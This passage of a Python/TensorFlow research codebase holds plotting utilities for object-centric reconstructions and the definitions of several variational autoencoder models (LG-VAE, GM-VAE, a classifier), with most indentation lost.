canvas_weights_only[h:h*2, i*w:(i+1)*w, :] = canvas_weighted[h:h*2, i*w:(i+1)*w, :] = canvas[h:h*2, i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas[h*2:, i*w:(i+1)*w, :] = obj_recon[i].numpy().reshape((num_cells*h,w,channel))
canvas_weighted[h*2:, i*w:(i+1)*w, :] = (obj_recon[i]*obj_alpha[i]*z_pres[i]*tf.nn.sigmoid(-z_depth[i])).numpy().reshape((num_cells*h,w,channel))
canvas_weights_only[h*2:, i*w:(i+1)*w, 0] = (tf.ones(shape=obj_alpha[i].shape)*z_pres[i]).numpy().reshape((num_cells*h,w)) # *tf.nn.sigmoid(-z_depth[i])
ax[0].imshow(np.squeeze(canvas),cmap='gray')
ax[0].set_title('reconstruction')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_weighted),cmap='gray')
ax[1].set_title('reconstruction weighted')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[2].imshow(np.squeeze(canvas_weights_only),cmap='inferno')
ax[2].set_title('weights')
ax[2].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[2].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
    if filename is None:
        plt.savefig(filepath + 'x_reconstruction_test_spair.png')
    else:
        plt.savefig(filepath + 'x_reconstruction_test' + filename + '.png', dpi=300)
# plt.close()
return plt
def reconstruction_bbox(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
#Get a batch of test images
test_ds = test_dataset.take(n).shuffle(n,seed=1)
for test_data in test_ds:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
# f, ax = plt.subplots(1, 1)
# ax[0].set_xticks(np.arange(0, h*n, w))
# ax[0].set_yticks(np.arange(0, h*(num_cells+2), w))
# num_channel = x_recon.shape[-1]
# print(obj_bbox_mask.numpy())
z_pres = tf.reshape(tf.round(tf.sigmoid(z_pres_logits)), [n, num_cells, 1])
colors = tf.constant([[1.0,1.0,1.0,1.0]])
obj_bbox_mask = obj_bbox_mask * z_pres
x_recon_w_bbox = tf.image.draw_bounding_boxes(x_recon,obj_bbox_mask,colors)
img_w_bbox = tf.image.draw_bounding_boxes(x_test[:,:,:,:3],obj_bbox_mask,colors)
canvas = np.empty((h*3, w*n, channel))
for i in range(n):
canvas[0:h,i*w:(i+1)*w, :] = images[i,:,:,:3]
canvas[h:h*2, i*w:(i+1)*w, :] = img_w_bbox[i].numpy().reshape((h,w,channel))
# canvas[h*2:h*3, i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas[h*2:h*3, i*w:(i+1)*w, :] = x_recon_w_bbox[i].numpy().reshape((h,w,channel))
# ax[0].imshow(np.squeeze(canvas),cmap='gray')
# ax[0].set_title('reconstruction')
# ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
# ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
plt.imshow(canvas)
    if filename is None:
        plt.savefig(filepath + 'x_reconstruction_bbox.png')
    else:
        plt.savefig(filepath + 'x_reconstruction_bbox' + filename + '.png', dpi=300)
# plt.close()
return plt
def glimpses_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
# Glimpses
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
object_size = obj_recon_alpha.shape[2]
f, ax = plt.subplots(1, 3)
ax[0].set_xticks(np.arange(0, object_size*n, object_size))
ax[0].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[1].set_xticks(np.arange(0, object_size*n, object_size))
ax[1].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[2].set_xticks(np.arange(0, object_size*n, object_size))
ax[2].set_yticks(np.arange(0, object_size*num_cells, object_size))
# plot glimpses
canvas_glimpses = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_recon = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_alpha = np.zeros((object_size*num_cells, object_size*n))
for i in range(n):
canvas_glimpses[:,i*object_size:(i+1)*object_size,:] = all_glimpses[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_recon[:,i*object_size:(i+1)*object_size,:] = obj_recon_unnorm[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_alpha[:,i*object_size:(i+1)*object_size] = obj_recon_alpha[i].numpy().reshape((num_cells*object_size,object_size))
ax[0].imshow(np.squeeze(canvas_glimpses),cmap='gray')
ax[0].set_title('Glimpses')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_glimpses_recon),cmap='gray')
ax[1].set_title('Glimpses reconstruction')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[2].imshow(np.squeeze(canvas_glimpses_alpha), cmap='viridis') #,cmap='gray'
ax[2].set_title('Glimpses alpha')
ax[2].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[2].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
if filename is None:
plt.savefig(filepath + 'glimpses.png')
else:
plt.savefig(filepath + 'glimpses' + filename + '.png', dpi=300)
# plt.close()
return plt
def glimpses_local_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
# Glimpses
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid, all_glimpses,
obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, z_bg, z_bg_mean, z_bg_sig, x_hat_recon, z_l, z_l_mean, z_l_sig, x_hat) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
object_size = obj_recon_alpha.shape[2]
f, ax = plt.subplots(1, 2)
ax[0].set_xticks(np.arange(0, object_size*n, object_size))
ax[0].set_yticks(np.arange(0, object_size*num_cells, object_size))
ax[1].set_xticks(np.arange(0, object_size*n, object_size))
ax[1].set_yticks(np.arange(0, object_size*num_cells, object_size))
# plot glimpses
canvas_glimpses = np.empty((object_size*num_cells, object_size*n, channel))
canvas_glimpses_recon = np.empty((object_size*num_cells, object_size*n, channel))
for i in range(n):
canvas_glimpses[:,i*object_size:(i+1)*object_size,:] = x_hat[i].numpy().reshape((num_cells*object_size,object_size,channel))
canvas_glimpses_recon[:,i*object_size:(i+1)*object_size,:] = x_hat_recon[i].numpy().reshape((num_cells*object_size,object_size,channel))
ax[0].imshow(np.squeeze(canvas_glimpses),cmap='gray')
ax[0].set_title('Glimpses')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_glimpses_recon),cmap='gray')
ax[1].set_title('Glimpses reconstruction')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
if filename is None:
plt.savefig(filepath + 'glimpses_local.png')
else:
plt.savefig(filepath + 'glimpses_local' + filename + '.png', dpi=300)
# plt.close()
return plt
def x_hat_reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid, all_glimpses,
obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *_, x_hat_recon, z_l, z_l_mean, z_l_sig) = model(x_test)
canvas_x_hat = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x_hat[0:h,i*w:(i+1)*w, :] = x_hat_recon[i].numpy().reshape((h,w,channel))
canvas_x_hat[h:h*2, i*w:(i+1)*w, :] = images[i,:,:,3:]
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x_hat)
    if filename is None:
        plt.savefig(filepath + 'x_hat_reconstruction_test_lg_vae.png')
    else:
        plt.savefig(filepath + 'x_hat_reconstruction_test' + filename + '.png')
plt.close()
return canvas_x_hat
```
#### File: split/vae/model.py
```python
import tensorflow as tf
import tensorflow.keras.layers as layers
from tensorflow.keras.layers import Dense, Conv2D, BatchNormalization, Flatten, Dropout
from tensorflow.keras import Model
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
class Sampling(layers.Layer):
def call(self, inputs):
z_mean, z_sig = inputs
epsilon = tf.random.normal(shape=z_sig.shape, mean=0, stddev=1, dtype=tf.float32)
return z_mean + z_sig * epsilon
class Encoder(layers.Layer):
def __init__(self, latent_dims = 32, variational = True, type = 'conv', y_size=None, tau=None):
super(Encoder, self).__init__()
self.variational = variational
self.latent_dims = latent_dims
self.flatten = Flatten()
self.tau = tau
if type=='fc':
self.e1 = Dense(1024, activation = 'relu')
self.e2 = Dense(512, activation = 'relu')
if variational:
self.e3_mean = Dense(latent_dims, activation = None)
self.e3_sd = Dense(latent_dims, activation = None)
self.sampling = Sampling()
else:
self.e3 = Dense(latent_dims, activation = 'relu')
self.call = self.call_fc
elif type == 'conv': #always variational
if self.variational:
self.e1 = Conv2D(filters = 32, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.e2 = Conv2D(filters = 64, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.e3 = Conv2D(filters = 128, kernel_size = 4, strides = 2, padding='same', activation = 'relu')
self.e4_mean = Dense(latent_dims, activation = None)
self.e4_sd = Dense(latent_dims, activation = 'softplus') #, kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(-1)
self.sampling = Sampling()
self.call = self.call_conv
else:
                raise NotImplementedError('Deterministic convolutional autoencoder not implemented')
elif type == 'gmvae':
self.h_block = tf.keras.Sequential([
Conv2D(filters = 128, kernel_size = 6, strides = 2, padding='same', activation = 'elu'),
Conv2D(filters = 128, kernel_size = 6, strides = 2, padding='same', activation = 'elu'),
Conv2D(filters = 128, kernel_size = 4, strides = 2, padding='same', activation = 'elu')])
self.y_block = tf.keras.Sequential([
Dense(1024, activation='elu'),
Dropout(rate=0.2),
Dense(128, activation='elu'),
])
self.do1 = Dropout(rate=0.2)
self.y_dense = Dense(y_size, activation=None, name='y_dense')
# Z prior block
self.do2 = Dropout(rate=0.2)
self.h_top_dense = Dense(512, activation='elu')
self.do3 = Dropout(rate=0.2)
self.z_prior_mean = Dense(latent_dims, activation=None, name='z_prior_mean')
self.do4 = Dropout(rate=0.2)
self.z_prior_sig = Dense(latent_dims, activation='softplus', name='z_prior_sig', bias_initializer=tf.keras.initializers.constant(1)) # kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(1))
#Encoder block
self.do5 = Dropout(rate=0.2)
self.e1 = Dense(512,activation='elu')
self.do6 = Dropout(rate=0.1)
self.z_mean = Dense(latent_dims,activation=None)
self.do7 = Dropout(rate=0.1)
self.z_sig = Dense(latent_dims,activation='softplus', bias_initializer=tf.keras.initializers.constant(1)) #kernel_initializer=tf.initializers.TruncatedNormal(),bias_initializer=tf.keras.initializers.constant(1))
self.sampling = Sampling()
self.call = self.call_gmvae
else:
            raise ValueError('Undefined encoder type: {}'.format(type))
def call_fc(self, x, training=False):
# x = tf.reshape(x, [-1,28*28])
x = self.flatten(x)
# print(x.shape)
x = self.e1(x)
x = self.e2(x)
        if self.variational:
            z_mean = self.e3_mean(x)
            # NOTE: Sampling treats its second input as a standard deviation,
            # but e3_sd has no activation here, so the value is unconstrained
            # (the conv path applies a softplus activation instead).
            z_sig = self.e3_sd(x)
            z = self.sampling((z_mean, z_sig))
            return z, z_mean, z_sig
else:
z = self.e3(x)
return z
def call_conv(self, x, training=False):
# x = tf.reshape(x, [-1,28,28,1])
# print('input shape:',x.shape)
x = self.e1(x)
x = self.e2(x)
x = self.e3(x)
# precode_size = np.prod(x.shape[1:])
# print('Precode shape:',x.shape)
# print('Precode size:',precode_size)
x = self.flatten(x)
z_mean = self.e4_mean(x)
z_sig = self.e4_sd(x)
z = self.sampling((z_mean,z_sig))
return z, z_mean, z_sig
def call_gmvae(self,x, training=False):
h = self.h_block(x)
h = self.flatten(h)
# y block
y_hidden = self.y_block(h)
y_logits = self.y_dense(y_hidden)
noise = tf.random.uniform(shape = y_logits.shape)
y = tf.nn.softmax( (y_logits - tf.math.log(-tf.math.log(noise))) / self.tau, axis=1) #gumbel softmax
z_prior_mean = self.z_prior_mean(y)
z_prior_sig = self.z_prior_sig(y)
h_top = self.h_top_dense(y)
h = self.e1(self.do5(h,training))
h = h + h_top
z_mean = self.z_mean(h)
z_sig = self.z_sig(h)
z = self.sampling((z_mean,z_sig))
return z, z_mean, z_sig, y, y_logits, z_prior_mean, z_prior_sig
def encode_y(self,y):
z_prior_mean = self.z_prior_mean(y)
z_prior_sig = self.z_prior_sig(y)
return z_prior_mean, z_prior_sig
class Decoder(layers.Layer):
def __init__(self, latent_dims = 32, image_shape = None, type='conv'):
super(Decoder, self).__init__()
self.latent_dims = latent_dims
self.image_shape = image_shape
self.type = type
self.d1 = Dense(self.image_shape[1]//8*self.image_shape[2]//8*128, activation = 'relu')
self.d2 = Conv2D(filters = 128, kernel_size = 4, strides = 1, padding='same', activation='relu')
self.d3 = Conv2D(filters = 64, kernel_size = 4, strides = 1, padding='same', activation='relu')
self.d4 = Conv2D(filters = 32, kernel_size = 6, strides = 1, padding='same', activation='relu')
self.d5 = Conv2D(filters = 6, kernel_size = 6, strides = 1, padding='same', activation=None)
def call(self, x):
# print('Code shape:',x.shape)
x = self.d1(x)
x = tf.reshape(x,[-1,self.image_shape[1]//8,self.image_shape[2]//8,128])
x = self.d2(x)
x = tf.image.resize(x,[self.image_shape[1]//4,self.image_shape[2]//4])
x = self.d3(x)
x = tf.image.resize(x,[self.image_shape[1]//2,self.image_shape[2]//2])
x = self.d4(x)
x = tf.image.resize(x,[self.image_shape[1],self.image_shape[2]])
x = self.d5(x)
return x[:,:,:,:3], x[:,:,:,3:] #x_mean, x_log_scale
class LGVae(Model):
def __init__(self, global_latent_dims, local_latent_dims, image_shape = None, variational = True, type = 'conv'):
super(LGVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.local_latent_dims = local_latent_dims
self.variational = variational
self.image_shape = image_shape
self.encoder_x = Encoder(latent_dims = global_latent_dims)
self.encoder_x_hat = Encoder(latent_dims = local_latent_dims)
self.decoder_x = Decoder(latent_dims = global_latent_dims + local_latent_dims, image_shape = image_shape) # use both z_g and z_l
self.decoder_x_hat = Decoder(latent_dims = local_latent_dims, image_shape = image_shape)
def call(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, z_x_hat, x_hat_mean, x_hat_log_scale, z_mean_x_hat, z_sig_x_hat
#else:
        raise NotImplementedError('Deterministic LG-AE not implemented')
def encode(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
if self.variational:
z_x, z_mean_x, z_sig_x = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
return z_x, z_x_hat
def decode(self, z_x, z_x_hat, rescale = True):
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
x_hat_recon = tf.clip_by_value((x_hat_mean + 1)*0.5,0.,1.)
return x_recon, x_hat_recon
return x_mean, x_hat_mean
class LGGMVae(Model):
def __init__(self, global_latent_dims, local_latent_dims, image_shape, y_size, tau, variational = True, type = 'conv'):
super(LGGMVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.local_latent_dims = local_latent_dims
self.variational = variational
self.image_shape = image_shape
self.y_size = y_size
self.encoder_x = Encoder(latent_dims = global_latent_dims, type='gmvae', y_size=y_size, tau=tau)
self.encoder_x_hat = Encoder(latent_dims = local_latent_dims)
self.decoder_x = Decoder(latent_dims = global_latent_dims + local_latent_dims, image_shape = image_shape) # use both z_g and z_l
self.decoder_x_hat = Decoder(latent_dims = local_latent_dims, image_shape = image_shape)
def call(self, inputs, training=False):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, z_x_hat, x_hat_mean, x_hat_log_scale, z_mean_x_hat, z_sig_x_hat, y, y_logits, z_prior_mean, z_prior_sig
#else:
        raise NotImplementedError('Deterministic LG-AE not implemented')
def encode(self, inputs):
x, x_hat = inputs[:,:,:,:3], inputs[:,:,:,3:]
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
z_x_hat, z_mean_x_hat, z_sig_x_hat = self.encoder_x_hat(x_hat)
return z_x, z_x_hat
def decode(self, z_x, z_x_hat, rescale = True):
x_mean, x_log_scale = self.decoder_x(tf.concat([z_x,z_x_hat],axis=1))
x_hat_mean, x_hat_log_scale = self.decoder_x_hat(z_x_hat)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
x_hat_recon = tf.clip_by_value((x_hat_mean + 1)*0.5,0.,1.)
return x_recon, x_hat_recon
return x_mean, x_hat_mean
def encode_y(self, y, rescale = True):
z_prior_mean, z_prior_sig = self.encoder_x.encode_y(y)
return z_prior_mean, z_prior_sig
def get_y(self,x):
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
# print('y_logits.shape:', y_logits.shape)
return y, y_logits
class GMVae(Model):
def __init__(self, global_latent_dims, image_shape, y_size, tau, variational = True, type = 'conv'):
super(GMVae, self).__init__()
# self.latent_dims = latent_dims
self.global_latent_dims = global_latent_dims
self.variational = variational
self.image_shape = image_shape
self.y_size = y_size
self.encoder_x = Encoder(latent_dims = global_latent_dims, type='gmvae', y_size=y_size, tau=tau)
self.decoder_x = Decoder(latent_dims = global_latent_dims, image_shape = image_shape) # use both z_g and z_l
def call(self, inputs,training=False):
x = inputs[:,:,:,:3]
# print(x.shape)
# print(x_hat.shape)
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
x_mean, x_log_scale = self.decoder_x(z_x)
return x_mean, x_log_scale, z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig
#else:
        raise NotImplementedError('Deterministic GMVae not implemented')
def encode(self, inputs):
x= inputs[:,:,:,:3]
if self.variational:
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
return z_x
def decode(self, z_x, rescale = True):
x_mean, x_log_scale = self.decoder_x(z_x)
if rescale:
x_recon = tf.clip_by_value((x_mean + 1)*0.5,0.,1.)
return x_recon
return x_mean
def encode_y(self, y, rescale = True):
z_prior_mean, z_prior_sig = self.encoder_x.encode_y(y)
return z_prior_mean, z_prior_sig
def get_y(self,x):
z_x, z_mean_x, z_sig_x, y, y_logits, z_prior_mean, z_prior_sig = self.encoder_x(x)
return y, y_logits
class Classifier(Model):
def __init__(self, latent_dims = 256, target_shape = None):
super(Classifier, self).__init__()
self.bn1 = BatchNormalization()
self.e1 = Conv2D(filters = 32, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
self.bn2 = BatchNormalization()
self.e2 = Conv2D(filters = 64, kernel_size = 6, strides = 2, padding='same', activation = 'relu')
        self.bn3 = BatchNormalization()
        # NOTE: the original file assigned bn3/e3 twice in a row, so a
        # 128-filter conv layer was shadowed and never used; only the
        # effective 256-filter layer is kept here.
        self.e3 = Conv2D(filters = 256, kernel_size = 4, strides = 2, padding='same', activation = 'relu')
self.flatten = Flatten()
self.d1 = Dropout(0.25)
self.e4 = Dense(latent_dims, activation = 'relu')
self.d2= Dropout(0.25)
self.e5 = Dense(latent_dims//4, activation = 'relu')
self.d3 = Dropout(0.25)
self.e6 = Dense(target_shape, activation = None)
def call(self,x, training=False):
x = self.e1(self.bn1(x,training))
x = self.e2(self.bn2(x,training))
x = self.e3(self.bn3(x,training))
x = self.e4(self.d1(self.flatten(x),training))
x = self.e5(self.d2(x,training))
x = self.e6(self.d3(x,training))
# print('output shape:',x.shape)
return x
```
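A minimal instantiation sketch for `LGVae`. The shapes are assumptions matching the 48x48 RGB data used elsewhere in the repository, and the input stacks `x` and `x_hat` along the channel axis, as `call` expects:

```python
# Hedged example (assumes the module above is importable as `model`).
import tensorflow as tf
from model import LGVae

vae = LGVae(global_latent_dims=32, local_latent_dims=32,
            image_shape=[None, 48, 48, 3])
batch = tf.random.normal([4, 48, 48, 6])   # channels 0-2: x, 3-5: x_hat
x_mean, *rest = vae(batch)
print(x_mean.shape)  # expected: (4, 48, 48, 3)
```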
#### File: split/vae/visualizer.py
```python
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import tensorflow as tf
from model import LGGMVae
from scipy.io import loadmat
from collections import defaultdict
mpl.use('agg')
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['savefig.dpi'] = 300
def reconstruction_test_lg_vae(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
#Get a batch of test images
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
# x_recon, z_mean_x, z_log_var_x, x_hat_recon, z_mean_x_hat, z_log_var_x_hat = model(x_test)
z_x, z_x_hat = model.encode(x_test)
x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
canvas_x = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x[0:h,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas_x[h:h*2, i*w:(i+1)*w, :] = (images[i,:,:,:3]+1)*0.5
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x)
if filename is None:
plt.savefig(filepath + 'x_reconstruction_test_lg_vae.png')
else:
plt.savefig(filepath + 'x_reconstruction_test' + filename + '.png')
plt.close()
canvas_x_hat = np.empty((h*2, w*n, channel))
for i in range(n):
canvas_x_hat[0:h,i*w:(i+1)*w, :] = x_hat_recon[i].numpy().reshape((h,w,channel))
canvas_x_hat[h:h*2, i*w:(i+1)*w, :] = (images[i,:,:,3:]+1)*0.5
plt.figure(figsize=(2*n,2))
plt.imshow(canvas_x_hat)
if filename is None:
plt.savefig(filepath + 'x_hat_reconstruction_test_lg_vae.png')
else:
plt.savefig(filepath + 'x_hat_reconstruction_test' + filename + '.png')
plt.close()
return canvas_x, canvas_x_hat
def style_transfer_test(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
#Hand-picked samples
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
rand_x_idx = tf.random.shuffle(idx)[:n]
rand_x_hat_idx = tf.random.shuffle(idx)[:n]
x = test_data[rand_x_idx.numpy()]
x_hat = test_data[rand_x_hat_idx.numpy()]
x_test = tf.concat([x,x_hat],axis=-1)
z_x, z_x_hat = model.encode(x_test)
    x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
    # relies on the module-level h, w, channel set by reconstruction_test_lg_vae
    canvas_1 = np.empty((h*3, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*2, i*w:(i+1)*w, :] = (x_test[i,:,:,3:]+1)*0.5
canvas_1[h*2:h*3,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'style_transfer.png')
else:
plt.savefig(filepath + 'style_transfer' + filename + '.png')
plt.close()
return canvas_1
def style_transfer_celeba(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images # [:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
x = x_test[:n,:,:,:3].numpy()
x_hat = x_test[n:2*n,:,:,:3].numpy()
x_2 = tf.concat([x,x_hat],axis=-1)
x_aug = tf.concat([x_test[:n],x_2],axis=0)
z_x, z_x_hat = model.encode(x_aug)
x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
canvas_1 = np.empty((h*4, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_aug[i,:,:,:3]+1)*0.5
canvas_1[h:h*2, i*w:(i+1)*w, :] = (x_aug[i+n,:,:,3:]+1)*0.5
canvas_1[h*2:h*3,i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas_1[h*3:h*4,i*w:(i+1)*w, :] = x_recon[n+i].numpy().reshape((h,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'style_transfer_celeba.png')
else:
plt.savefig(filepath + 'style_transfer_celeba' + filename + '.png')
plt.close()
return canvas_1
def plot_latent_dims(model, dataset, variational = False):
    # expects a model exposing `latent_dims` (note: LGVae/LGGMVae above do not)
    z_list = [[] for dim in range(model.latent_dims)]
for images,_ in dataset:
if variational:
z,_,_ = model.encode(images)
else:
z = model.encode(images)
z = z.numpy()
for dim in range(z.shape[1]):
z_list[dim].extend(z[:,dim])
plt.figure()
plt.scatter(z_list[0],z_list[1],s=1)
if variational:
plt.savefig('output/2d_latent_var.png')
else:
plt.savefig('output/2d_latent_det.png')
plt.close()
for i,z in enumerate(z_list):
plt.figure()
plt.hist(z)
if variational:
plt.savefig('output/latent_var_'+str(i)+'.png')
else:
plt.savefig('output/latent_det_'+str(i)+'.png')
plt.close()
def generate(model, filename = None, filepath = None):
if isinstance(model,LGGMVae): #within a cluster
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
z_g = tf.random.normal(shape = [100, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_l = tf.random.normal(shape = [100, model.local_latent_dims])
else:
z_g = tf.random.normal(shape=[100, model.global_latent_dims])
z_l = tf.random.normal(shape=[100, model.local_latent_dims])
x_generated,_ = model.decode(z_g,z_l,True)
h,w, channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas[i*h:(i+1)*h, j*w:(j+1)*w, :] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generated_image.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
return canvas
def generate_traverse(model):
if model.latent_dims != 2:
raise NotImplementedError('Implemented for 2D latent only')
z1_list = z2_list = np.linspace(-3,3,30)
z_list = [[z1,z2] for z1 in z1_list for z2 in z2_list]
generated_img = model.decode(tf.convert_to_tensor(z_list))
canvas = np.empty((h*30, w*30))
n = 30
for i in range(n):
for j in range(n):
